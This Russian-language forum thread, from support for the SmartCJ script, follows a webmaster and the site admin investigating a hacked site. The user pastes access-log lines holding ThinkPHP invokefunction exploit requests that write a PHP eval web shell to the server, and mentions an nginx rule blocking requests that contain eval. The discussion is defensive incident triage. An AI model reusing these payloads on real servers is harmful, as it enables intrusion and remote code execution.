SmartCJ Free берёт только с кликов или уже с прогрузки морды?

darkover
Posts: 1518
Joined: Sat Apr 13, 2013 8:59 pm

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by darkover »

Две темы по одной проблеме:
У меня такая же тема ( я перед апом сделал бекам файлов смарта, и сейчас глянул в /libs/functions.php
https://my.jetscreenshot.com/demo/20230 ... f-88kb.jpg

upd я нашел старый инсталятор смарта, от 13 года, /admin/graph/jpgraph_plotmark являлся частью смарта
darkover
Posts: 1518
Joined: Sat Apr 13, 2013 8:59 pm

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by darkover »

Я предлагаю дописать селф-чек файлов смарта по md5 суммы, пусть проверяет сам себя в раз сутки и сигнализирует, что файл functions.php изменился, а список с файлами и md5 тоже был в ионкубе, что бы не было возможности его отредактировать
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by admin »

если были записи в баше - то у хакера был полноценный юзер доступ
вот тут и надо искать как это получилось
Don't forget to run script update
darkover
Posts: 1518
Joined: Sat Apr 13, 2013 8:59 pm

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by darkover »

admin wrote: Sun Apr 16, 2023 6:02 am если были записи в баше - то у хакера был полноценный юзер доступ
вот тут и надо искать как это получилось
в башлоге никаких записей нет, кроме моих, логина левого через юзера или рута кроме моих тож нет. У меня логи для этих сайтов, что похакали, два года пишутся, я забыл там logrotate настроить. Есть подозрительные активности в плане запросов извне
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by admin »

darkover wrote: Sun Apr 16, 2023 11:00 am
admin wrote: Sun Apr 16, 2023 6:02 am если были записи в баше - то у хакера был полноценный юзер доступ
вот тут и надо искать как это получилось
в башлоге никаких записей нет, кроме моих, логина левого через юзера или рута кроме моих тож нет. У меня логи для этих сайтов, что похакали, два года пишутся, я забыл там logrotate настроить. Есть подозрительные активности в плане запросов извне
я полагаю была какая-то причина почему вы написали что были подозрительные, но не написали какие именно?
Don't forget to run script update
darkover
Posts: 1518
Joined: Sat Apr 13, 2013 8:59 pm

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by darkover »

admin wrote: Sun Apr 16, 2023 1:32 pm
darkover wrote: Sun Apr 16, 2023 11:00 am
admin wrote: Sun Apr 16, 2023 6:02 am если были записи в баше - то у хакера был полноценный юзер доступ
вот тут и надо искать как это получилось
в башлоге никаких записей нет, кроме моих, логина левого через юзера или рута кроме моих тож нет. У меня логи для этих сайтов, что похакали, два года пишутся, я забыл там logrotate настроить. Есть подозрительные активности в плане запросов извне
я полагаю была какая-то причина почему вы написали что были подозрительные, но не написали какие именно?
./domain.com.access.log:216.83.55.14 - - [24/Feb/2022:15:06:56 +0000] "GET /index.php?function=call_user_func_array&s=/Index/%5Cthink%5Capp/invokefunction&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=123.php&vars%5B1%5D%5B%5D=%3C?php%20@$c%20=%20@str_pad(@$_POST%5B1%5D,%201,%20%22%22);eval(%27%27%20.%20$c);%20?%3E HTTP/1.1" 200 10995 "http://domain.com/index.php?function=ca ... %20$c);%20?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" "120.157.178.91,216.83.55.14"
./domain.com.access.log:216.83.55.14 - - [24/Feb/2022:15:06:57 +0000] "GET /index.php?function=call_user_func_array&s=/Index/%5Cthink%5Capp/invokefunction&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=statics/123.php&vars%5B1%5D%5B%5D=%3C?php%20@$c%20=%20@str_pad(@$_POST%5B1%5D,%201,%20%22%22);eval(%27%27%20.%20$c);%20?%3E HTTP/1.1" 200 11011 "http://domain.com/index.php?function=ca ... %20$c);%20?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" "112.238.125.72,216.83.55.14"
./domain.com.access.log:216.83.55.14 - - [24/Feb/2022:15:06:58 +0000] "GET /index.php?function=call_user_func_array&s=/Index/%5Cthink%5Capp/invokefunction&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=upload/123.php&vars%5B1%5D%5B%5D=%3C?php%20@$c%20=%20@str_pad(@$_POST%5B1%5D,%201,%20%22%22);eval(%27%27%20.%20$c);%20?%3E HTTP/1.1" 200 11031 "http://domain.com/index.php?function=ca ... %20$c);%20?>" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" "11.146.159.86,216.83.55.14"
./domain.com.access.log:216.83.55.14 - - [24/Feb/2022:15:06:59 +0000] "GET /index.php?s=index/%5Cthink%5Capp/invokefunction&function=assert&vars%5B0%5D=eval($_POST%5B123%5D)&vars%5B1%5D%5B%5D=1 HTTP/1.1" 200 10995 "http://domain.com/index.php?s=index/\x5 ... ars[1][]=1" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html" "61.209.79.201,216.83.55.14"

Сейчас я дописал маппинг на ngixn и запросы ( гет/пост) которые содержат eval, user_func и тд и тп, просто не долетают до php а рубятся на корню
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by admin »

это бот который сканирует известные уязвимости и если ввести в гугле то видно что это thinkphp

https://securitynews.sonicwall.com/xmlp ... exploited/
Don't forget to run script update
darkover
Posts: 1518
Joined: Sat Apr 13, 2013 8:59 pm

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by darkover »

admin wrote: Sun Apr 16, 2023 4:01 pm это бот который сканирует известные уязвимости и если ввести в гугле то видно что это thinkphp

https://securitynews.sonicwall.com/xmlp ... exploited/
Не тогда более чего-то подозрительного я не вижу. Буду тогда более детально grepить логи, благо они есть.
darkover
Posts: 1518
Joined: Sat Apr 13, 2013 8:59 pm

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by darkover »

admin wrote: Sun Apr 16, 2023 4:01 pm это бот который сканирует известные уязвимости и если ввести в гугле то видно что это thinkphp

https://securitynews.sonicwall.com/xmlp ... exploited/
Ну тогда более чего-то подозрительного я не вижу. Буду тогда более детально grepить логи, благо они есть.
admin
Site Admin
Posts: 37202
Joined: Wed Sep 10, 2008 11:43 am

Re: SmartCJ Free берёт только с кликов или уже с прогрузки морды?

Post by admin »

ok
Don't forget to run script update
Post Reply